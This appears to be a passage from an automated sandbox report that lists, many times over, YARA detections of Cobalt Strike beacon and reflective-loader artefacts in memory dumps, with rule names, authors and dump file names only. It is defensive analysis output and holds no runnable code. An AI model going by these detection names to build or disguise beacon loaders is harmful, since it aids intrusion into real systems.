                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
